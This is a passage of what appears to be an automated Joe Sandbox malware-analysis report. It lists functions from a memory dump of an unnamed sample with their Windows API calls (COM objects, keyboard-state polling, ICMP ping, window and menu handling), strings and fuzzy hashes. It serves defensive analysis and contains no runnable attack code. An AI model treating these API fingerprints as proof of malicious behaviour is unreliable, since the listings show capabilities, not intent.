API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 323675364-22481851
Opcode ID: 2bae040a0e278d0c99887e59a0d5d4956b79a89b2406a188b9a2dfac83ba1e81
Instruction ID: 827f16c01abcf6416d3f27aadb0b3a6028c27a56d248931c78b6993d131e10fa
Opcode Fuzzy Hash: 2bae040a0e278d0c99887e59a0d5d4956b79a89b2406a188b9a2dfac83ba1e81
Instruction Fuzzy Hash: FD410772810229EADF15EBA4DC89DEDB778BF04750B144129E906B3161EB386E44CFA0

Function 007E3C30 Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 007E3C5C
CoInitialize.OLE32(00000000), ref: 007E3C8A
CoUninitialize.OLE32 ref: 007E3C94
_wcslen.LIBCMT ref: 007E3D2D
GetRunningObjectTable.OLE32(00000000,?), ref: 007E3DB1
SetErrorMode.KERNEL32(00000001,00000029), ref: 007E3ED5
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 007E3F0E
CoGetObject.OLE32(?,00000000,007FFB98,?), ref: 007E3F2D
SetErrorMode.KERNEL32(00000000), ref: 007E3F40
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 007E3FC4
VariantClear.OLEAUT32(?), ref: 007E3FD8

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
String ID:
API String ID: 429561992-0
Opcode ID: 77ae205a96bc98e889a19b0b2df52a9bc8f65aa671c3c7cb7512923befcc9a14
Instruction ID: 522e71081e5fee14574d3506d893fa00a46f060e1a36f3930be9ab25f6d27180
Opcode Fuzzy Hash: 77ae205a96bc98e889a19b0b2df52a9bc8f65aa671c3c7cb7512923befcc9a14
Instruction Fuzzy Hash: 41C15571608245DFC700DF29C88892BBBE9FF89744F10491DF98A9B250DB34EE05CB92

Function 007D7A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 007D7AF3
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 007D7B8F
SHGetDesktopFolder.SHELL32(?), ref: 007D7BA3
CoCreateInstance.OLE32(007FFD08,00000000,00000001,00826E6C,?), ref: 007D7BEF
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 007D7C74
CoTaskMemFree.OLE32(?,?), ref: 007D7CCC
SHBrowseForFolderW.SHELL32(?), ref: 007D7D57
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 007D7D7A
CoTaskMemFree.OLE32(00000000), ref: 007D7D81
CoTaskMemFree.OLE32(00000000), ref: 007D7DD6
CoUninitialize.OLE32 ref: 007D7DDC

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
String ID:
API String ID: 2762341140-0
Opcode ID: 42eac1719fc344895f7ca7e972c44fc7f46ae27935f393ff7d23aa9bd9a8e404
Instruction ID: 689f964229fa4bcae54388ac27d341ea254d5b5057cd65c6ed42078de24c5ee1
Opcode Fuzzy Hash: 42eac1719fc344895f7ca7e972c44fc7f46ae27935f393ff7d23aa9bd9a8e404
Instruction Fuzzy Hash: 2CC1F975A04109EFCB14DFA4C888DAEBBB9FF48314B148499E91AEB361D734ED45CB90

Function 007BFA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 007BFAAF
SafeArrayAllocData.OLEAUT32(?), ref: 007BFB08
VariantInit.OLEAUT32(?), ref: 007BFB1A
SafeArrayAccessData.OLEAUT32(?,?), ref: 007BFB3A
VariantCopy.OLEAUT32(?,?), ref: 007BFB8D
SafeArrayUnaccessData.OLEAUT32(?), ref: 007BFBA1
VariantClear.OLEAUT32(?), ref: 007BFBB6
SafeArrayDestroyData.OLEAUT32(?), ref: 007BFBC3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 007BFBCC
VariantClear.OLEAUT32(?), ref: 007BFBDE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 007BFBE9

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 9fccfedd496ccd2978efe182fa2905a03889bc669ae8116de2ec6d466cabfee1
Instruction ID: d6f6225de0e917cfcb09d0bf3eeb02fe5df228d60e92b391425fb1d4e35173a7
Opcode Fuzzy Hash: 9fccfedd496ccd2978efe182fa2905a03889bc669ae8116de2ec6d466cabfee1
Instruction Fuzzy Hash: 39416075A00219DFCB05DF64CC58AFEBBB9FF08754F00C469E946A7261CB38A945CBA0

Function 007C9C79 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 007C9CA1
GetAsyncKeyState.USER32(000000A0), ref: 007C9D22
GetKeyState.USER32(000000A0), ref: 007C9D3D
GetAsyncKeyState.USER32(000000A1), ref: 007C9D57
GetKeyState.USER32(000000A1), ref: 007C9D6C
GetAsyncKeyState.USER32(00000011), ref: 007C9D84
GetKeyState.USER32(00000011), ref: 007C9D96
GetAsyncKeyState.USER32(00000012), ref: 007C9DAE
GetKeyState.USER32(00000012), ref: 007C9DC0
GetAsyncKeyState.USER32(0000005B), ref: 007C9DD8
GetKeyState.USER32(0000005B), ref: 007C9DEA

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 46cfca32a9284d0d237edaf0d6a734ab0eaf3fe80416ef0f531d6dda62c4a0f6
Instruction ID: 72a29f1c7a3c6169a04fa01b29048ef0ff83dde40916a45ed5885d227dfe3d5d
Opcode Fuzzy Hash: 46cfca32a9284d0d237edaf0d6a734ab0eaf3fe80416ef0f531d6dda62c4a0f6
Instruction Fuzzy Hash: A141D8746047C969FFB18670940CBB5BFA06B21344F04805ED7C7675C2EBAC99C8C7A2

Function 007E055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 007E05BC
inet_addr.WSOCK32(?), ref: 007E061C
gethostbyname.WSOCK32(?), ref: 007E0628
IcmpCreateFile.IPHLPAPI ref: 007E0636
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 007E06C6
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 007E06E5
IcmpCloseHandle.IPHLPAPI(?), ref: 007E07B9
WSACleanup.WSOCK32 ref: 007E07BF

Strings

Ping, xrefs: 007E0676

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 1cfd540f26480482fc49da3fb5de48aaf2a805f40eee46570217598546933a93
Instruction ID: 53354cfe0bad919fb4ecfab269b971ae4676011e59e0c1a89958fd712bdbd077
Opcode Fuzzy Hash: 1cfd540f26480482fc49da3fb5de48aaf2a805f40eee46570217598546933a93
Instruction Fuzzy Hash: 5D91AF75605241DFD720DF16C588F1ABBE0AF48318F1485A9F46A8B6A2C7B8EC85CFD1

Function 007E8CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00000000,?), ref: 007E8CF3

Part of subcall function 007C8E54: _wcslen.LIBCMT ref: 007C8E77

_wcslen.LIBCMT ref: 007E8D4E
_wcslen.LIBCMT ref: 007E8D9C
_wcslen.LIBCMT ref: 007E8DDC
_wcslen.LIBCMT ref: 007E8E6E

Strings

winapi, xrefs: 007E8D96, 007E8D9B
cdecl, xrefs: 007E8D48, 007E8D4D
stdcall, xrefs: 007E8DD6, 007E8DDB
none, xrefs: 007E8E65, 007E8E6A

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: _wcslen$BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 707087890-567219261
Opcode ID: 5714ece12e2b9f1d25a12c052667a55fcce8ee10c6e65d95181ed07a4e8f3a29
Instruction ID: 079024be08d857d5865ab7314389804348522270b4638d8e1625cabc20177e30
Opcode Fuzzy Hash: 5714ece12e2b9f1d25a12c052667a55fcce8ee10c6e65d95181ed07a4e8f3a29
Instruction Fuzzy Hash: CC51C231A015569BCF64DFADC9409BEB3A5BF68320B204229E92AE72C4DB39DD40C791

Function 007E372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 007E3774
CoUninitialize.OLE32 ref: 007E377F
CoCreateInstance.OLE32(?,00000000,00000017,007FFB78,?), ref: 007E37D9
IIDFromString.OLE32(?,?), ref: 007E384C
VariantInit.OLEAUT32(?), ref: 007E38E4
VariantClear.OLEAUT32(?), ref: 007E3936

Strings

NULL Pointer assignment, xrefs: 007E381E
Invalid parameter, xrefs: 007E3865
Failed to create object, xrefs: 007E37E4, 007E389A

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 636576611-1287834457
Opcode ID: bc2e2e56bf34a7cd5fc380d1d2789f51d1692b0200d02061ea53889998c5ee13
Instruction ID: c9647a81f702948222876715469a0182885bf3d89d578ea28b47ea27347f0c52
Opcode Fuzzy Hash: bc2e2e56bf34a7cd5fc380d1d2789f51d1692b0200d02061ea53889998c5ee13
Instruction Fuzzy Hash: 77618C70609341EFD311DF56C88DB6ABBE8EF48754F004909F9859B291C778EE48CBA2

Function 00765BEA Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00765C7A

Part of subcall function 00765D0A: GetClientRect.USER32(?,?), ref: 00765D30
Part of subcall function 00765D0A: GetWindowRect.USER32(?,?), ref: 00765D71
Part of subcall function 00765D0A: ScreenToClient.USER32(?,?), ref: 00765D99

GetDC.USER32 ref: 007A46F5
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 007A4708
SelectObject.GDI32(00000000,00000000), ref: 007A4716
SelectObject.GDI32(00000000,00000000), ref: 007A472B
ReleaseDC.USER32(?,00000000), ref: 007A4733
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 007A47C4

Strings

U, xrefs: 007A4693
@U=u, xrefs: 007A4708

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: @U=u$U
API String ID: 4009187628-4110099822
Opcode ID: 37de97ffbf5dc0846cc19e2793f94fe90ea88c6358701c85eb9b0a187402301c
Instruction ID: 6805b5c3a7d5bc5a3169cf49616179a5027952a56893fd66f61ba5270db061dc
Opcode Fuzzy Hash: 37de97ffbf5dc0846cc19e2793f94fe90ea88c6358701c85eb9b0a187402301c
Instruction Fuzzy Hash: CF71E131500249DFCF218F64C988ABA7BB5FFCA360F144369ED565A266C77A8841DF60

Function 007F8B02 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00779BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00779BB2

Part of subcall function 0077912D: GetCursorPos.USER32(?), ref: 00779141
Part of subcall function 0077912D: ScreenToClient.USER32(00000000,?), ref: 0077915E
Part of subcall function 0077912D: GetAsyncKeyState.USER32(00000001), ref: 00779183
Part of subcall function 0077912D: GetAsyncKeyState.USER32(00000002), ref: 0077919D

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 007F8B6B
ImageList_EndDrag.COMCTL32 ref: 007F8B71
ReleaseCapture.USER32 ref: 007F8B77
SetWindowTextW.USER32(?,00000000), ref: 007F8C12
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 007F8C25
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 007F8CFF

Strings

@GUI_DROPID, xrefs: 007F8C51
@GUI_DRAGFILE, xrefs: 007F8C9A
@U=u, xrefs: 007F8C25

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID$@U=u
API String ID: 1924731296-2104563098
Opcode ID: 94e09c246f62ec1a9e48b99b984fe87c0c1449a514fdf76ad5583c23e08ab330
Instruction ID: 024520d26143f18fa1e1015040fb3fd29cb6e7a653862ed200132026343a0cf0
Opcode Fuzzy Hash: 94e09c246f62ec1a9e48b99b984fe87c0c1449a514fdf76ad5583c23e08ab330
Instruction Fuzzy Hash: 45518C71204308AFDB00DF24DD5AFBA77E4FB88750F400A29FA56972E1CB789944CB62

Function 007D3388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 007D33CF

Part of subcall function 00769CB3: _wcslen.LIBCMT ref: 00769CBD

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 007D33F0

Strings

"%s" (%d) : ==> %s:%s%s, xrefs: 007D3504
Error: , xrefs: 007D34D1
Line %d (File "%s"):, xrefs: 007D3443, 007D345C
Incorrect parameters to object property !, xrefs: 007D34AB
^ ERROR , xrefs: 007D349E
"%s" (%d) : ==> %s:, xrefs: 007D3522

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-3080491070
Opcode ID: bc5b6a6e8bf2ed1a31f723a68638e654dc66e6c7c6ff4e78897b35350a762c05
Instruction ID: c871767e67ebf0095ff7d22e1af55ef650de8075dc11e02aeac12457480e3f0d
Opcode Fuzzy Hash: bc5b6a6e8bf2ed1a31f723a68638e654dc66e6c7c6ff4e78897b35350a762c05
Instruction Fuzzy Hash: 54515C71900219EADF15EBA0DE4AEEEB778BF14740F104065F90672291EB3D2F58DB61

Function 007CB5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 007CB5FC
_wcslen.LIBCMT ref: 007CB608
_wcslen.LIBCMT ref: 007CB64D
_wcslen.LIBCMT ref: 007CB68C
_wcslen.LIBCMT ref: 007CB6C7

Strings

APPEND, xrefs: 007CB6C1, 007CB6C6
REMOVE, xrefs: 007CB602, 007CB607
KEYS, xrefs: 007CB647, 007CB64C
EXISTS, xrefs: 007CB686, 007CB68B

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 1256254125-769500911
Opcode ID: 8a6c661f0db6954f2cfd9f18997a415263d1edafb7de60a5e3b8d0273d84f5d5
Instruction ID: 8354b32bcbe5f1665165276217007a045826bcc1c17233ac1ac16e134eb80876
Opcode Fuzzy Hash: 8a6c661f0db6954f2cfd9f18997a415263d1edafb7de60a5e3b8d0273d84f5d5
Instruction Fuzzy Hash: 5241B932A00027DBCB205F7DC992ABE77A5BB60754F24412EF965E7284E739DD81C790

Function 007D5393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 007D53A0
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 007D5416
GetLastError.KERNEL32 ref: 007D5420
SetErrorMode.KERNEL32(00000000,READY), ref: 007D54A7

Strings

READY, xrefs: 007D5460, 007D5468
NOTREADY, xrefs: 007D544B
READONLY, xrefs: 007D5452
UNKNOWN, xrefs: 007D5444
INVALID, xrefs: 007D5459

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: c5df35f2ebf64836ab3c9b2d9737749ab2746c0e9573b0a09fb4097e200997c8
Instruction ID: 295890fa1ec0d7acef396f21aa4076f91a3147049822cb9ccf25289be3d443e6
Opcode Fuzzy Hash: c5df35f2ebf64836ab3c9b2d9737749ab2746c0e9573b0a09fb4097e200997c8
Instruction Fuzzy Hash: E431C375A00548DFC711DF68C488EAABBB4FF05305F14806AE906DB392E779DD86CB92

Function 007F3C46 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON

Download Yara Rule

APIs

CreateMenu.USER32 ref: 007F3C79
SetMenu.USER32(?,00000000), ref: 007F3C88
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007F3D10
IsMenu.USER32(?), ref: 007F3D24
CreatePopupMenu.USER32 ref: 007F3D2E
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 007F3D5B
DrawMenuBar.USER32 ref: 007F3D63

Strings

F, xrefs: 007F3D4E
0, xrefs: 007F3C54

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup
String ID: 0$F
API String ID: 161812096-3044882817
Opcode ID: 8897126496c49f430cec6eef9534d69af9ab1244f97830f36b5272e91432d55c
Instruction ID: 66a81b9ed2d499aca604443832cc57c143e19edacebea491255999fecea2db99
Opcode Fuzzy Hash: 8897126496c49f430cec6eef9534d69af9ab1244f97830f36b5272e91432d55c
Instruction Fuzzy Hash: 45416975A01209EFDF14DF64D844AAABBB5FF49351F144028FA46A7360D738AA14CF94

Function 007F2D03 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 007F2D1B
GetDC.USER32(00000000), ref: 007F2D23
GetDeviceCaps.GDI32(00000000,0000005A), ref: 007F2D2E
ReleaseDC.USER32(00000000,00000000), ref: 007F2D3A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 007F2D76
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 007F2D87
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,007F5A65,?,?,000000FF,00000000,?,000000FF,?), ref: 007F2DC2
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 007F2DE1

Strings

@U=u, xrefs: 007F2D87, 007F2DE1

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID: @U=u
API String ID: 3864802216-2594219639
Opcode ID: f61b6710d1980d3bfd14a031b28d68210d24cc4798ef078fd33c9e47c5e151c4
Instruction ID: 66f503172628e6876d2fdd5c080d1a070d9634820ce2da666f71f832a4c085b7
Opcode Fuzzy Hash: f61b6710d1980d3bfd14a031b28d68210d24cc4798ef078fd33c9e47c5e151c4
Instruction Fuzzy Hash: 04316B72201618BBEB158F50CD8AFFB3BA9EF09715F048055FE08DA291C6799C51CBA5

Function 007C209F Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 007C20AB
GetClassNameW.USER32(00000000,?,00000100), ref: 007C20C0
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 007C214D

Strings

list, xrefs: 007C212F
smallicons, xrefs: 007C2115
@U=u, xrefs: 007C214D
SHELLDLL_DefView, xrefs: 007C20CC
details, xrefs: 007C20FB
